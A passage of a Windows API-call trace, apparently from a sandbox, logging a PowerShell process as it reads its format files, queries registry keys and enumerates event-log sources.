[1]=0x8d, [2]=0xdb, [3]=0x24, [4]=0xa1, [5]=0x9c, [6]=0xa8, [7]=0x4b))) returned 0x0 [0089.921] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xed9b6417, Data2=0xb88d, Data3=0x4e7d, Data4=([0]=0xa9, [1]=0x7a, [2]=0xc9, [3]=0xe0, [4]=0x53, [5]=0x77, [6]=0x8e, [7]=0x75))) returned 0x0 [0089.922] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0089.922] GetLastError () returned 0x0 [0089.922] GetFileType (hFile=0x324) returned 0x1 [0089.922] SetErrorMode (uMode=0x1) returned 0x1 [0089.922] GetFileType (hFile=0x324) returned 0x1 [0089.922] ReadFile (in: hFile=0x324, lpBuffer=0x357d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x357d7f0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.923] GetLastError () returned 0x0 [0089.924] ReadFile (in: hFile=0x324, lpBuffer=0x357d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x357d7f0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.924] GetLastError () returned 0x0 [0089.924] ReadFile (in: hFile=0x324, lpBuffer=0x357d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x357d7f0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.924] GetLastError () returned 0x0 [0089.924] ReadFile (in: hFile=0x324, lpBuffer=0x357d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x357d7f0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.924] GetLastError () returned 0x0 [0089.924] ReadFile (in: hFile=0x324, lpBuffer=0x357d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x357d7f0*, lpNumberOfBytesRead=0x13e504*=0x8b4, lpOverlapped=0x0) returned 1 [0089.924] GetLastError () returned 0x0 [0089.925] ReadFile (in: hFile=0x324, lpBuffer=0x357cc44, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x357cc44*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.925] GetLastError () returned 0x0 [0089.925] ReadFile (in: hFile=0x324, lpBuffer=0x357d7f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x357d7f0*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.925] GetLastError () returned 0x0 [0089.925] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e488 | out: phkResult=0x13e488*=0x324) returned 0x0 [0089.925] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x0, lpcbData=0x13e4cc*=0x0 | out: lpType=0x13e4d0*=0x1, lpData=0x0, lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.925] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x3953b0, lpcbData=0x13e4cc*=0x56 | out: lpType=0x13e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.925] RegCloseKey (hKey=0x324) returned 0x0 [0089.925] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x1568e855, Data2=0x6d76, Data3=0x4d8e, Data4=([0]=0x9f, [1]=0xfe, [2]=0x96, [3]=0xe8, [4]=0x13, [5]=0x3a, [6]=0xf1, [7]=0x54))) returned 0x0 [0089.925] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xdd64e0c8, Data2=0xc8a2, Data3=0x45d9, Data4=([0]=0xaf, [1]=0xfa, [2]=0xe9, [3]=0xa6, [4]=0xe1, [5]=0x67, [6]=0xf1, [7]=0xf4))) returned 0x0 [0089.926] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0089.926] GetLastError () returned 0x0 [0089.926] GetFileType (hFile=0x324) returned 0x1 [0089.926] SetErrorMode (uMode=0x1) returned 0x1 [0089.926] GetFileType (hFile=0x324) returned 0x1 [0089.926] ReadFile (in: hFile=0x324, lpBuffer=0x35b46fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x35b46fc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.927] GetLastError () returned 0x0 [0089.927] ReadFile (in: hFile=0x324, lpBuffer=0x35b46fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x35b46fc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.927] GetLastError () returned 0x0 [0089.928] ReadFile (in: hFile=0x324, lpBuffer=0x35b46fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x35b46fc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.928] GetLastError () returned 0x0 [0089.928] ReadFile (in: hFile=0x324, lpBuffer=0x35b46fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x35b46fc*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.928] GetLastError () returned 0x0 [0089.928] ReadFile (in: hFile=0x324, lpBuffer=0x35b46fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x35b46fc*, lpNumberOfBytesRead=0x13e504*=0xe98, lpOverlapped=0x0) returned 1 [0089.928] GetLastError () returned 0x0 [0089.929] ReadFile (in: hFile=0x324, lpBuffer=0x35b3d34, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x35b3d34*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.929] GetLastError () returned 0x0 [0089.929] ReadFile (in: hFile=0x324, lpBuffer=0x35b46fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x35b46fc*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.929] GetLastError () returned 0x0 [0089.929] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e488 | out: phkResult=0x13e488*=0x324) returned 0x0 [0089.929] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x0, lpcbData=0x13e4cc*=0x0 | out: lpType=0x13e4d0*=0x1, lpData=0x0, lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.929] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x3953b0, lpcbData=0x13e4cc*=0x56 | out: lpType=0x13e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.929] RegCloseKey (hKey=0x324) returned 0x0 [0089.929] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe1f2e209, Data2=0x34ba, Data3=0x4512, Data4=([0]=0xa1, [1]=0xfb, [2]=0x27, [3]=0x74, [4]=0x76, [5]=0x9c, [6]=0x35, [7]=0xfb))) returned 0x0 [0089.930] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x97d558d0, Data2=0x1f6d, Data3=0x4d54, Data4=([0]=0xb0, [1]=0xe2, [2]=0x8c, [3]=0x20, [4]=0x2f, [5]=0x8a, [6]=0x3f, [7]=0xc3))) returned 0x0 [0089.936] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e57c | out: phkResult=0x13e57c*=0x324) returned 0x0 [0089.936] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13e5cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e5d0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13e5cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e5d0*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.936] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x3953b0, lpcchValueName=0x13e5f4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x13e5f4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0089.936] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x3953b0, lpcchValueName=0x13e5f4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x13e5f4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0089.936] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x13e5d4, lpData=0x0, lpcbData=0x13e5d0*=0x0 | out: lpType=0x13e5d4*=0x1, lpData=0x0, lpcbData=0x13e5d0*=0x8) returned 0x0 [0089.936] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x13e5d4, lpData=0x3953b0, lpcbData=0x13e5d0*=0x8 | out: lpType=0x13e5d4*=0x1, lpData="2.0", lpcbData=0x13e5d0*=0x8) returned 0x0 [0089.959] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e538 | out: phkResult=0x13e538*=0x328) returned 0x0 [0089.959] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13e588, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e58c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13e588*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e58c*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.959] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x3953b0, lpcchValueName=0x13e5b0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x13e5b0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0089.959] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x3953b0, lpcchValueName=0x13e5b0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x13e5b0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0089.959] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x13e590, lpData=0x0, lpcbData=0x13e58c*=0x0 | out: lpType=0x13e590*=0x1, lpData=0x0, lpcbData=0x13e58c*=0x8) returned 0x0 [0089.959] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x13e590, lpData=0x3953b0, lpcbData=0x13e58c*=0x8 | out: lpType=0x13e590*=0x1, lpData="2.0", lpcbData=0x13e58c*=0x8) returned 0x0 [0089.960] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.960] GetLastError () returned 0xcb [0089.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.961] GetLastError () returned 0xcb [0089.966] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e4f8 | out: phkResult=0x13e4f8*=0x32c) returned 0x0 [0089.966] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13e560, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e55c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13e560*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e55c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.966] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x0, lpName=0x3953b0, lpcchName=0x13e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x13e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.966] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x1, lpName=0x3953b0, lpcchName=0x13e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x13e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.967] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x2, lpName=0x3953b0, lpcchName=0x13e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x13e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.967] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x3, lpName=0x3953b0, lpcchName=0x13e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x13e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.967] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x4, lpName=0x3953b0, lpcchName=0x13e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x13e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.967] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x5, lpName=0x3953b0, lpcchName=0x13e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x13e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.967] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x6, lpName=0x3953b0, lpcchName=0x13e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x13e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.967] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x7, lpName=0x3953b0, lpcchName=0x13e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x13e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.967] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x8, lpName=0x3953b0, lpcchName=0x13e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x13e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0089.967] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x348) returned 0x0 [0089.967] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x0) returned 0x2 [0089.967] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x358) returned 0x0 [0089.968] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x0) returned 0x2 [0089.968] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x35c) returned 0x0 [0089.968] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x0) returned 0x2 [0089.968] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x360) returned 0x0 [0089.968] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x0) returned 0x2 [0089.968] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x364) returned 0x0 [0089.968] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x0) returned 0x2 [0089.968] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x368) returned 0x0 [0089.968] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x0) returned 0x2 [0089.969] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x0) returned 0x5 [0090.028] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x36c) returned 0x0 [0090.028] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x0) returned 0x2 [0090.028] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x370) returned 0x0 [0090.029] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e528 | out: phkResult=0x13e528*=0x374) returned 0x0 [0090.029] RegCloseKey (hKey=0x374) returned 0x0 [0090.029] RegCloseKey (hKey=0x32c) returned 0x0 [0090.029] RegCloseKey (hKey=0x370) returned 0x0 [0090.047] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x37b268, nSize=0x13e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x13e674) returned 0x1 [0090.047] GetLastError () returned 0x3 [0090.048] GetUserNameW (in: lpBuffer=0x3953b0, pcbBuffer=0x13e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13e67c) returned 1 [0090.072] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e4dc | out: phkResult=0x13e4dc*=0x32c) returned 0x0 [0090.072] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13e544, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e540, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13e544*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13e540*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.072] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x0, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.072] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x1, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.072] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x2, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.072] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x3, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.073] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x4, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.073] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x5, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.073] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x6, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.073] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x7, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.073] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x8, lpName=0x3953b0, lpcchName=0x13e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x13e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0090.073] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x374) returned 0x0 [0090.073] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.073] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x378) returned 0x0 [0090.073] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.073] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x37c) returned 0x0 [0090.074] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.074] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x380) returned 0x0 [0090.074] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.074] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x384) returned 0x0 [0090.074] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.074] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x388) returned 0x0 [0090.074] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.074] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x5 [0090.076] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x38c) returned 0x0 [0090.077] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x0) returned 0x2 [0090.077] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x390) returned 0x0 [0090.077] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e50c | out: phkResult=0x13e50c*=0x394) returned 0x0 [0090.077] RegCloseKey (hKey=0x394) returned 0x0 [0090.077] RegCloseKey (hKey=0x32c) returned 0x0 [0090.077] RegCloseKey (hKey=0x390) returned 0x0 [0090.077] RegOpenKeyExW (in: hKey=0x80000002, 